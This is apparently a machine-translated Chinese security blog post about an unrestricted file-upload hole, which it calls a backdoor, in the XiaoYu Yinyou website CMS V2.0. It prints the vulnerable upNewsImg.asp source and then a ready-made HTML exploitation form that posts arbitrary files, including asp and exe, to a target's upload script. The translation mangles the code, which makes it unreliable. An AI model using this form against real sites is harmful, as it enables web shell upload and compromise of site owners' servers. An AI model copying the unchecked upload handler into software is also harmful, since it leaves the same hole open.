Xiaoyu yinyou website content management system V2.0

(Why does the author leave a backdoor ?)

XiaoYu's website content management system:

Currently, the most powerful whole-site system includes the modules required by General websites, such as news articles, downloads, movies, pictures, and music, which are independent and closely related to each other. They are infinitely hierarchical and can be freely called, templates are supported. html is generated at the front end to save system resources to the maximum extent. The best choice for large and medium-sized portal websites

Html is generated on the content page, which is relatively safe. It seems that there is not much problem in the background.

But go to the upload directory and find two files.

Uploadset. asp upNewsIMg. asp

Uploadset. asp has been verified, but upNewsImg. asp has no restrictions. Let's take a look at the source code:

CODE:

<Link rel = "stylesheet" type = "text/css" href = "../admin/admin.css">

<Script language = "JavaScript">

<! -- Hide from older browsers...

// Function to add pic

Function Addpic (imagePath ){

Window. opener. frames. message. focus ();

Zookeeper opener.frames.message.document.exe cCommand (InsertImage, false, imagePath );

}

// -->

</Script>

<% Server. scripttimeout = 1900%>

<%

UpFilePath = "NewsIMG /"

Fileweb = "UPLOAD /"

Nameset = 1

Pathset = 0

Dim I

I = 1

%>

<%

Function makefilename (fname)

Fname = now ()

Fname = replace (fname ,"-","")

Fname = replace (fname ,"","")

Fname = replace (fname ,":","")

Makefilename = fname

End function

%>

<! -- # Include FILE = "upload_5xsoft.inc" -->

<%

Dim upload, file, formName, iCount

Dim url, url1

Set upload = new upload_5xSoft

ICount = 0

For each formName in upload. file: Lists All uploaded files.

Set file = upload. file (formName) to generate a file object

If file. FileSize> 0 then if FileSize> 0, file data exists.

Fname = makefilename (now () & iCount & "." & GetExtendName (file. FileName)

File. SaveAs Server. mappath (UpFilePath & fname) save the file

ICount = iCount + 1

Response. write "image" & I & "<input type =" "text" "name =" & I & "" size = "" 55 "" style = "" border -style: solid; border-width: 1 "" value = "".. /"& fileweb & UpFilePath & fname &"> <br> [<a href = # onclick = "" Addpic (.. /"& fileweb & UpFilePath & fname &") ""> click here to add the image "& I &" to the Editor </a>] <br>"

I = I + 1

Set file = nothing

End if

Next

Set upload = nothing Delete this object

Function GetExtendName (FileName)

Dim ExtName

ExtName = LCase (FileName)

ExtName = right (ExtName, 3)

ExtName = right (ExtName, 3-Instr (ExtName ,"."))

GetExtendName = ExtName

End function

%>

[Copy to clipboard]

Haha, you can create an upload page by yourself and upload it directly, even the exe file, not to mention asp or anything.

There is an address after the upload, which is a backdoor left by the author.

Exploitation file:

CODE:

<Html>

<Head>

<Title> File Upload </title>

<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">

</Head>

<Body bgcolor = "# D6EF7E" text = "#000000">

<Form name = "form1" method = "post" action = "http://www.target.com/upload/upnewsimg.asp" enctype = "multipart/form-data">

<Input type = "hidden" name = "act" value = "upload">

<Div align = "center">

<Center>

<Table width = "98%" border = "0" cellspacing = "0" cellpadding = "5" bordercolordark = "# CCCCCC" bordercolorlight = "#000000" style = "border-collapse: collapse "bordercolor =" #111111 "height =" 102 ">

<Tr>

<Th height = "16" align = "left" valign = "middle">

<Div align = "center">

<B> upload images </B>

</Div>

</Th>

</Tr>

<Tr align = "left" valign = "middle" bgcolor = "# eeeeee">

<Td bgcolor = "# FFFFFF" height = "1" valign = "top">

<Input type = "file" name = "file1" style = "width: 200" class = "tx1">

</Td>

</Tr>

<Tr align = "center" valign = "middle">

<Td align = "left" id = "upid" height = "5" bgcolor = "# FFFFFF">

</Td>

</Tr>

<Tr align = "center" valign = "middle" bgcolor = "# eeeeee">

<Td bgcolor = "# FFFFFF" height = "28">

<Input type = "submit" name = "Submit" value = "· submit ·" class = "bt">

<Input type = "reset" name = "Submit2" value = "· zhongzhi ·" class = "bt"> </td>

</Tr>

<Tr align = "center" valign = "middle" bgcolor = "# eeeeee">

<Td height = "14" bgcolor = "# FFFFFF"> </td>

</Tr>

</Table>

</Center>

</Div>

</Form>

</Body>

</Html>

[Copy to clipboard]

Fun.

My Blog http://hhuai.cn

Article: Bad

Source: evil baboons Information Security Team